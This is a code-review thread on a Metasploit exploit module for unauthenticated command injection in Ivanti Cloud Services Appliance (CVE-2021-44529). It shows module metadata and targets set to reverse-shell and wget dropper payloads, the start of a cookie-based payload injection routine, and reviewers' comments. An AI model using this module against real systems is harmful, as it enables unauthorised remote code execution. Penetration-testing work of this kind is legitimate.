modules/exploits/linux/http/ivanti_csa_unauth_rce_cve_2021_44529.rb

```diff
@@ -0,0 +1,175 @@
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Ivanti Cloud Services Appliance (CSA) Command Injection',
+        'Description' => %q{
+          This module exploits a command injection vulnerability in the Ivanti Cloud Services Appliance (CSA)
+          for Ivanti Endpoint Manager. A cookie based code injection vulnerability in the Cloud Services Appliance before `4.6.0-512`
+          allows an unauthenticated user to execute arbitrary code with limited permissions.
+          Successful exploitation results in command execution as the `nobody` user.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Jakub Kramarz', # Discovery
+          'h00die-gr3y <h00die.gr3y[at]gmail.com>' # MSF Module contributor
+        ],
+        'References' => [
+          [ 'CVE', '2021-44529'],
+          [ 'URL', 'https://forums.ivanti.com/s/article/SA-2021-12-02' ],
+          [ 'URL', 'https://attackerkb.com/topics/XTKrwlZd7p/cve-2021-44529' ],
+          [ 'EDB', '50833'],
+          [ 'PACKETSTORM', '166383']
+        ],
+        'DisclosureDate' => '2021-12-02',
+        'Platform' => ['unix', 'linux', 'php'],
+        'Arch' => [ARCH_CMD, ARCH_X64, ARCH_PHP],
+        'Privileged' => false,
+        'Targets' => [
+          [
+            'Unix Command',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_http'
+              }
+            }
+          ],
+          [
+            'PHP Command',
+            {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP,
+              'Type' => :php_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'php/meterpreter/reverse_tcp'
+              }
+            }
+          ],
+          [
+            'Linux Dropper',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X64],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => [ 'wget', 'printf', 'echo' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x64/meterpreter_reverse_http'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 0,
+        'DefaultOptions' => {
+          'RPORT' => 443,
+          'SSL' => true
+        },
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'Reliability' => [REPEATABLE_SESSION],
+          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
+        }
+      )
+    )
+  end
+
+  def randomize_cookie(payload)
+    # randomize the cookie in terms cookie pairs "name=value"
+    # Number of cookie pairss should be at least 4, and the first cookie pair should be always name='ab'
+    # and the cookie number matching  no_of_cookies-2 should contain the payload
```

Comment:
```suggestion
    # Note that the Nth cookie in the request, where N=no_of_cookies-2,  should contain the payload.
```

Reply:
Reworded this but out of interest did you figure out why this has to be the case? Seems like an interesting edge case. Not a blocker though, just curious 👍